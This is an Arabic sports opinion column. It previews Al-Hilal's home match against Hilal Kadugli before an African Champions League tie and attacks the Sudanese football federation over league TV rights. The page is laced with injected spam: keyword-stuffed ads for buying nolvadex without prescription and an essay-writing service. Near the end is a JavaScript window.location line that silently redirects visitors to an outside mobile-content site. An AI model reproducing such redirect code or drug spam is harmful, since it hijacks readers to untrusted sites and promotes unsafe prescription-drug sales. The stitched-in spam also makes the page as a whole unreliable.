سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

نزار عجيب يكتب بعنوان ضرب اكتر من عصفور

4

nolvadex cost cheap nolvadex no prescription buy nolvadex prices nolvadex on cycle dosage nolvadex tamoxifen citrate for sale nolvadex purchase online

image

                                    ضرب اكثر من عصفور

يسعى الهلال لضرب اكثر من عصفور بحجر واحدة عندما يلعب مباراة الجولة الرابعة امام هلال كادوقلي مساء الليلة في استاده , المباراة تعد البروفة الاساسية للفريق الازرق قبل مواجهة بطل نزبار في ذهاب الدور التمهيدي لدوري ابطال افريقيا يوم الاحد .

هنالك عدة اهداف يسعى الفريق ومدربه باتريك لاصطيادها من خلال هذه المباراة , وستكون البداية بمحاولة الظهور المقنع وتقديم المستوى الذي يرضي الانصار وجماهير الفريق بعد ان المستوى الباهت الذي كان عليه الازرق في لقاء الجولة الثالثة امام الخرطوم .

the best essay writing service – custom written essays ?if you have ever wondered what the best essay writing service uk was then, you will find the answer at perfectcustomwriting.co.uk.

الفريق الهلالي يبدو في حالة جاهزية افضل لهذه المباراة خصوصا وانه استعاد خدمات بعض لاعبيه المصابين امثال كيبي وبوتاكو وينتظر ان تكون هذه المباراة بداية ظهور جديد لهما عقب اصابتيهما امام اهلي شندي .

قد لايبدأ كيبي المباراة اساسيا وكذا الحال بالنسبة للاثيوبي بوتاكو , ولكن الاهم ان عودتهما في اللقاء مع هلال كادوقلي ستكون بمثابة تجهيز لخهما لخوض المباراة الافريقية يوم الاحد , واعتقد ان الفريق في حاجة لهما اكثر من اي وقت مضى .

المباراة عندما تكون في استاد الهلال يكون لها طعم مختلف لان الارضية غير والاجواء غير , عكس ملعب الخرطوم المتهالك الذي لايساعد اي فريق للعب كرة قدم حقيقة في ظل الارضية الصناعية السيئة والبالية .

المطلوب من المدرب البلجيكي اختيار التشكيل الذي سيلعب المباراة الافريقية , لان هذه المباراة كما ذكرنا تعد البروفة الاساسية لذلك اللقاء , ومن المهم جدا الاطمئنان على شكل الفريق خلال مباراة هلال كادوقلي .

الخروج بالثلاث نقاط ايضا تعد هدفا اخر للفريق الهلالي لان وجود الفريق في المركز الثالث طبعا امر غير طبيعي لكن نقول ان المشوار لازال طويلا ولانهتم حاليا بهذا المركز وفارق النقاط .

هلال كادوقلي ليس لديه مايخسره وهو يلعب المباراة بلا ضغوطات ولذلك من الطبيعي ان نجده في بعض مراحل المباراة افضل , ومن الممكن ان يشكل صعوبة على الازرق في اللقاء ولكن في كل الاحوال اعتقد ان التجربة ستكون مفيدة جدا امامه .

نتمنى ان تكون هذه المباراة فرصة اخرى للمهاجم كاريكا الذي لازلنا نعول عليه وننتظر عودته لهز الشباك , لان مدثر ولد ليكون في منطقة الجزاء ويسجل الاهداف , هذه هي وظيفته وقدراته معروفة للجميع .

بالامس انتظرنا حسم المسلسل الممل وهو البث التلفزيوني للدوري الممتاز ولكن لم يتم حسم اي شئ من خلال الاجتماع الذي كان مقررا , ويوم بعد نكتشف مدى صعف اتحاد الكرة وعدم قدرته على حسم هذا الملف الذي سبب لنا صداعا دائما .

اتحاد يفشل في تسويق اكبر بطولاته في كل موسم لايستحق البقاء لادارة الكرة السودانية لانه اثبت فشله وعدم قدرته على ادارة هذه الملفات الكبيرة , واتمنى ان تكون هذه الدورة هي الاخيرة لمعتصم جعفر الذي كان وجوده في كرسي الرئاسة اكبر خطا .

جعفر استعجل ليكون رئيسا لاتحاد الكرة وكان يفترض ان يتدرج في العمل ليكون في منصب نائب الرئيس فقط لعدة سنوات قادمة , لان تجربته الماضية كشفت عن ضعف شخصيته وعدم قدرته على احداث اي تطور , بل في عهده شهدنا كل انواع التخبط والاخطاء الادرية الفادحة .

الدوري السوداني هو ام البطولات في اتحاد الكرة والتعامل معه بهذه الطريقة امر مخجل للغاية لان البطولة تستحق ان تنقل ونتابع مبارياتها على الاقل وعدم تلفزة المباريات يؤكد فعلا تخلفنا عن ركب الكرة العربية والافريقية بمئات الاميال ..

Nazar.ageeb@gmail.com

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.